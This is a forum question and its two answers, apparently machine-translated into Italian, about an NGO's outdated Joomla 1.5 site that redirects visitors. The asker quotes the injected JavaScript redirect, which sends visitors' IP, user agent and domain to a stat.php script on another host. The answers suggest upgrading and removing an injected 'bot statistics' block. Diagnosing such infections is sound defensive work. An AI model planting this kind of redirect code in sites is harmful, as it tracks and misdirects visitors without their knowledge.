ONG Joomla! sito: infetto da malware? Iniezione JavaScript?

Question

ONG Joomla! sito: infetto da malware? Iniezione JavaScript?

#1 da (3 voti)
#2 da (2 voti)

0

Aiutaci con questo sito di ONG che esegue Joomla! 1.5.

Al momento non possono pagare un professionista della sicurezza, quindi forse voi ragazzi potete aiutare a isolare il problema?

Se vai su link verrai reindirizzato ad una pagina openDNS link

C'è un tag javascript in fondo alla pagina:

<script type="text/javascript">location.replace("http://guidetest.a.id.opendns.com/?url=www%2Ealabora%2Eorg%2Fcss%2Fstat%2Ephp%3Fip%3D186%2E115%2E71%2E1%26useragent%3Dmozilla%252F5%2E0%2B%2528x11%253B%2Blinux%2Bi686%2B%2528x86%5F64%2529%2529%2Bapplewebkit%252F537%2E36%2B%2528khtml%252C%2Blike%2Bgecko%2529%2Bchrome%252F28%2E0%2E1500%2E52%2Bsafari%252F537%2E36%26domainname%3Dcasatrespatios%2Eorg%26fullpath%3D%252F&servfail&nref");</script>

che sembra essere il colpevole. Questo codice non è nel file modello php corrispondente. Non ho idea di come questo codice venga iniettato nella pagina. Qualcuno ha un'idea?

javascript joomla malware

posta fablife 16.12.2013 - 22:12

fonte

2 risposte

Leggi altre domande sui tag javascript joomla malware

CISSP è adatto per un architetto Java? [chiuso] La porta aperta 25 su server Web è pericolosa?

score 3 · Answer 1

Il supporto per Joomla 1.5 LTS è terminato nel dicembre 2012 . Questo di solito significa che non verranno rilasciate più patch di sicurezza (o altre patch di manutenzione).

La "soluzione" è migrare il contenuto da un backup ben noto a una versione di Joomla supportata o ad altri sistemi di gestione dei contenuti correnti.

Anche se qualcuno qui fosse in grado di capire una correzione, dovresti eseguire la migrazione comunque, perché Joomla 1.5 non è più supportato, quindi potresti farlo anche ora.

score 2 · Answer 2

Le mie indagini mi hanno portato a questo link: link

Sembra che il problema sia relativo a tali informazioni e la rimozione del codice nella parte inferiore etichettata come "" Questo codice viene utilizzato per le statistiche globali dei bot "sembra aver risolto il problema.

Stranamente, quel file cambia per quel file dal 21. Luglio 2012 ... Quindi deve essere stato infettato molto tempo fa, e nessuno ha mai notato fino a quando il sito che stava reindirizzando non ha più risposto o qualcosa del genere ...

In ogni caso suggerirò alla ONG di ottenere finanziamenti per aggiornare il sito, al fine di essere aggiornato sulla sicurezza. Grazie a tutti quelli che hanno suonato.